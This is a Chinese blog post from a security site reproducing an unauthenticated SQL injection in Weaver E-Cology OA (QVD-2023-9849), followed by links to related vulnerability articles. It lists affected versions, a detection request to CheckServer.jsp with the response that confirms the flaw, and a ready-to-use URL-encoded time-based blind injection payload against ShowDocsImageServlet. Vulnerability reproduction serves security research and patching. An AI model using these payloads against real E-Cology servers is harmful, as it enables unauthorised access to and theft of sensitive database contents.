泛微E-Cology CheckServer.jspSQL注入漏洞(QVD-2023-9849) 复现

最新推荐文章于 2024-08-20 19:49:35 发布

makven60

最新推荐文章于 2024-08-20 19:49:35 发布

阅读量2.6k

点赞数 2

分类专栏： sql注入漏洞复现文章标签： web安全

本文链接：https://blog.csdn.net/huangyongkang666/article/details/134478420

版权

漏洞复现同时被 2 个专栏收录

26 篇文章 5 订阅

订阅专栏

sql注入

5 篇文章 0 订阅

订阅专栏

泛微E-Cology CheckServer.jspSQL注入漏洞(QVD-2023-9849) 复现

1.漏洞描述

泛微 Ecology OA 系统对用户传入的数据过滤处理不当，导致存在 SQL 注入漏洞，未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令，从而窃取数据库敏感信息。

影响版本：泛微 Ecology 9.x <= v10.56；泛微 Ecology 8.x <= v10.56

2.漏洞复现

POC

/mobile/plugin/CheckServer.jsp?type=mobileSetting

返回状态码200且参数值为{“error”;”system error”}证明漏洞存在

在这里插入图片描述

进行延时注入：

/weaver/weaver.docs.docs.ShowDocsImageServlet?docId=1%2F**%2Fand(select%2F**%2F1)%3E0%2F**%2Fwaitfor%2F**%2Fdelay'0%3A0%3A10'%2F**%2F

0%3A0%3A10 实际上表示 0:0:10 延时10秒

在这里插入图片描述

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

makven60

关注关注

2
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
泛微E-Cology CheckServer.jspSQL注入漏洞(QVD-2023-9849) 复现

泛微E-Cology CheckServer.jspSQL注入漏洞(QVD-2023-9849) 复现
复制链接

扫一扫

专栏目录

泛微e-cology9 SQL注入漏洞复现(QVD-2023-5012)

0xSec

03-20

1万+

泛微e-cology9中存在SQL注入漏洞，未经身份认证的远程攻击者即可利用此漏洞获取数据库敏感信息，进一步利用可能导致目标系统被控。

泛微E-Cology getFileViewUrl SSRF漏洞复现

0xSec

07-09

2191

泛微E-Cology getFileViewUrl 接口处存在服务器请求伪造漏洞，未经身份验证的远程攻击者利用此漏洞扫描服务器所在的内网或本地端口，获取服务的banner信息，窥探网络结构，甚至对内网或本地运行的应用程序发起攻击，获取服务器内部敏感配置，造成信息泄露。

参与评论您还未登录，请先登录后发表或查看评论

0day 泛微E-Cology-Rest-存在任意文件读取漏洞

weixin_43167326的博客

04-12

1052

任意文件读取漏洞（Arbitrary File Read Vulnerability）是一种安全漏洞，它允许攻击者读取应用程序服务器上的文件，而这些文件在正常情况下不应该被外界访问。这种类型的漏洞通常是由不当的输入验证或不安全的文件操作功能引起的。利用此类漏洞，攻击者可能能够访问敏感信息，如配置文件、密码存储文件、数据库备份，甚至是执行代码的能力，如果能够读取服务器上的特定脚本或程序代码的话。

【漏洞复现】泛微SQL注入漏洞

失心少年

07-26

334

技术文章仅供参考，任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得利用网络从事危害国家安全、荣誉和利益，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。本文所提供的工具仅用于学习，禁止用于其他！该系统存在post注入。

【漏洞复现】泛微 e-cology 前台SQL注入漏洞

2301_79099363的博客

07-12

2123

【漏洞复现】泛微 e-cology 前台SQL注入漏洞

【高危】泛微 e-cology ＜10.57 存在 SQL注入漏洞（POC）（MPS-ndqt-0im5）

murphysec的博客

04-28

1572

泛微协同管理应用平台(e-cology)是一套企业大型协同管理平台。泛微 e-cology 受影响版本存在SQL注入漏洞，未经授权的远程攻击者可通过发送特殊的HTTP请求来获取数据库的敏感信息。

泛微 e-cology v10 远程代码执行漏洞

最新发布

棉花糖的博客

08-20

1608

泛微新一代数字化运营构建平台E10(e-cology10、eteams10)，是基于原eteams平台之上全新研发，同时融合了原E9产品的所有功能，最终研发出全新平台。

泛微 e-cology SQL注入漏洞复现

07-12

1995

此文章仅用于技术交流，严禁用于对外发起恶意攻击！！！

漏洞复现泛微OA E-Cology V9 browser.jsp SQL注入漏洞

qq_50854662的博客

03-20

7968

漏洞复现泛微OA E-Cology V9 browser.jsp SQL注入漏洞

泛微E-Cology SQL注入漏洞复现（QVD-2023-15672）

0xSec

07-11

9579

由于泛微e-cology未对用户的输入进行有效的过滤，直接将其拼接进了SQL查询语句中，导致系统出现SQL注入漏洞。远程未授权攻击者可利用此漏洞获取敏感信息，进一步利用可能获取目标系统权限等。

泛微e-cology9 browser.jsp SQL注入漏洞

Myu_wzy的博客

03-20

1718

泛微e-cology9中存在SQL注入漏洞，经身份认证的远程攻击者即可利用此漏洞获取数据库敏感信息，进一步利用可能导致目标系统被控。

【漏洞复现】泛微OA E-Cology V9 browser.jsp SQL注入漏洞复现及利用(CNVD-2023-12632)

做自己喜欢的事，并将其发挥到极致！

05-10

3119

泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。泛微新一代移动办公平台E-Cology不仅组织提供了一体化的协同工作平台，将组织事务逐渐实现全程电子化，改变传统纸质文件，实体签章的方式，泛微OA E-Cology平台browser.jsp处存在SQL注入漏洞，攻击者通过漏洞可以获取服务器数据库权限。

【1day】复现泛微e-cology SQL注入漏洞weaver.file.FileDownloadForOutDoc（QVD-2023-15672）

记录并分享学习安全的知识点..

07-12

998

泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。泛微e-cology SQL注入漏洞weaver.file.FileDownloadForOutDoc存在SQL注入漏洞。

红蓝对抗重点OA系统漏洞利用工具新年贺岁版V2.0

siu~

08-29

1351

红蓝对抗重点OA系统漏洞利用工具新年贺岁版V2.0的设计中旨是为了帮助各位师傅在渗透测试和挖洞中以及攻防演练中能够快速对OA系统进行快速定位进行漏洞检测和利用.,目前已实现20款OA系统的漏洞检测和利用，共133个漏洞.听说day一打一个准,也欢迎各位师傅补充漏洞和反馈误报,我们将积极作出调整和完善.

SRC挖掘日常3

jennycisp的博客

05-06

827

在实际的渗透测试过程中，面对复杂多变的网络环境，当常用工具不能满足实际需求的时候，往往需要对现有工具进行扩展，或者编写符合我们要求的工具、自动化脚本，这个时候就需要具备一定的编程能力。如果你把每周要学的内容精细化到这种程度，你还会担心学不会，入不了门吗，其实说到底就是学了两个月，但都是东学一下，西学一下，什么内容都是浅尝辄止，没有深入进去，所以才会有学了2个月，入不了门这种感受。聊完宏观的，我们再落到具体的技术点上来，给你看看我给团队小伙伴制定的网络安全学习路线，整体大概半年左右，具体视每个人的情况而定。

泛微e-cology OA 系统远程代码执行漏洞

黑白的博客

12-14

3740

声明好好学习，天天向上漏洞描述 2019年9月19日，泛微e-cology OA系统自带BeanShell组件被爆出存在远程代码执行漏洞。攻击者通过调用BeanShell组件中未授权访问的问题接口可直接在目标服务器上执行任意命令，目前该漏洞安全补丁已发布，请使用泛微e-cology OA系统的用户尽快采取防护措施。泛微e-cology OA系统存在java Beanshell接口，攻击者调用该Beanshell可以被未授权访问接口，构造特定的数据请求绕过OA自带的一些安全限制进行远程命令执行。影响范

【漏洞复现】深信服行为感知系统日志中心 c.php 远程命令执行

凝聚力安全团队

07-17

307

深信服行为感知系统日志中心 c.php存在任意命令执行漏洞，攻击者通过漏洞可以执行服务器任意命令控制服务器权限

【漏洞预警】泛微E-Cology ofsLogin任意用户登陆漏洞

做自己喜欢的事，并将其发挥到极致！

05-17

5363

泛微e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。泛微e-cology前台任意用户登录漏洞：泛微e-cology9部分版本中存在前台任意用户登录漏洞。该漏洞允许未经身份验证的攻击者通过发送构造的请求触发漏洞，成功利用此漏洞的攻击者可登录任意用户。

0day 未公开泛微E-Cology 存在源码信息泄露漏洞

weixin_43167326的博客

07-09

988

泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。。

泛微oa e-cology v9 browser.jsp sql注入漏洞

09-15

泛微OA E-Cology V9是一款常用的企业办公自动化系统，该系统的browser.jsp页面存在SQL注入漏洞。SQL注入是一种常见的网络攻击技术，攻击者可以通过构造恶意的SQL语句来绕过系统的认证和授权机制，进而获取敏感数据或者对系统进行非法操作。泛微OA E-Cology V9中的browser.jsp页面是用于显示OA系统中的个人文件夹和公共文件夹。攻击者可以在该页面中输入恶意的SQL语句，通过执行这些恶意SQL语句，攻击者可以获取到不应该被访问的数据，比如其他用户的文件，甚至可以对数据库进行修改和损坏。为了防止SQL注入漏洞的利用，可以采取以下措施： 1. 输入过滤和验证：在服务器端对用户输入的数据进行过滤和验证，去除或转义可能包含恶意SQL代码的字符，确保只接受合法的输入。 2. 使用参数化查询：尽量使用参数化查询代替拼接SQL语句的方式，参数化查询可以预编译SQL语句，避免在拼接时引入恶意代码。 3. 限制数据库用户的权限：对数据库用户进行权限控制，确保每个用户只拥有最小必要的权限，减少攻击者利用SQL注入漏洞进行非法操作的机会。 4. 及时更新和修补漏洞：及时跟进厂商的安全通告并安装最新的补丁程序，确保系统始终处于最新的安全状态。综上所述，泛微OA E-Cology V9中的browser.jsp页面存在SQL注入漏洞，但通过合理的安全措施和注意事项，我们可以有效地减少该漏洞被利用的风险。